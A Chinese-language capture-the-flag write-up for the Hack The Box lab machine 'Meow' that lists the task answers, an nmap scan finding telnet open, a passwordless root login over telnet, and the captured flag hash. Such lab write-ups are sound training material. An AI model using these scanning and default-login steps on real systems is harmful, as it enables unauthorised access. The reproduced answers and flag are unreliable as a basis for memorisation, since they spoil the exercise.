HTB-Meow题解

Task 1

Q:What does the acronym VM stand for?

A:virtual machine

Task 2

Q:What tool do we use to interact with the operating system in order to start our VPN connection?

A:terminal

Task 3


Q:What service do we use to form our VPN connection?

A:openvpn

Task 4

Q:What is the abreviated name for a tunnel interface in the output of your VPN boot-up sequence output?

A:tun

Task 5

Q:What tool do we use to test our connection to the target?

A:ping

Task 6

Q:What is the name of the tool we use to scan the target's ports?

A:nmap

Task 7

Q:What service do we identify on port 23/tcp during our scans?

A:telnet

Task 8

Q:What username ultimately works with the remote management login prompt for the target?

这个问的是机器的用户名是啥,那只能连上去看看了

0x01 信息收集

直接拿nmap扫一下

nmap

┌──(root💀kali)-[~]
└─# nmap 10.129.69.56
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-27 20:33 CST
Nmap scan report for 10.129.69.56
Host is up (0.45s latency).
Not shown: 999 closed tcp ports (reset)
PORT   STATE SERVICE
23/tcp open  telnet

Nmap done: 1 IP address (1 host up) scanned in 4.75 seconds

发现开放了telnet服务,那么我们直接连上去

telnet

┌──(root💀kali)-[~]
└─# telnet 10.129.69.56
Trying 10.129.69.56...
Connected to 10.129.69.56.
Escape character is '^]'.

  █  █         ▐▌     ▄█▄ █          ▄▄▄▄
  █▄▄█ ▀▀█ █▀▀ ▐▌▄▀    █  █▀█ █▀█    █▌▄█ ▄▀▀▄ ▀▄▀
  █  █ █▄█ █▄▄ ▐█▀▄    █  █ █ █▄▄    █▌▄█ ▀▄▄▀ █▀█


Meow login: root
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-77-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Wed 27 Apr 2022 12:36:35 PM UTC

  System load:           0.0
  Usage of /:            41.7% of 7.75GB
  Memory usage:          4%
  Swap usage:            0%
  Processes:             142
  Users logged in:       1
  IPv4 address for eth0: 10.129.69.56
  IPv6 address for eth0: dead:beef::250:56ff:feb9:d656

 * Super-optimized for small spaces - read how we shrank the memory
   footprint of MicroK8s to make it the smallest full K8s around.

   https://ubuntu.com/blog/microk8s-memory-optimisation

75 updates can be applied immediately.
31 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Wed Apr 27 12:22:06 UTC 2022 on pts/0
root@Meow:~# 

这样我们就知道了这台机器的账户是root

A:root

Task 9

Q:Submit root flag

寻找flag

flag

Last login: Wed Apr 27 12:22:06 UTC 2022 on pts/0
root@Meow:~# ls
flag.txt  snap
root@Meow:~# cat flag.txt
b40abdfe23665f766f9c61ecba8a4c19
root@Meow:~# 

ls查看一下当前目录,发现了flag.txt


那么我们直接cat flag.txt得到了flag

评论区
头像
文章目录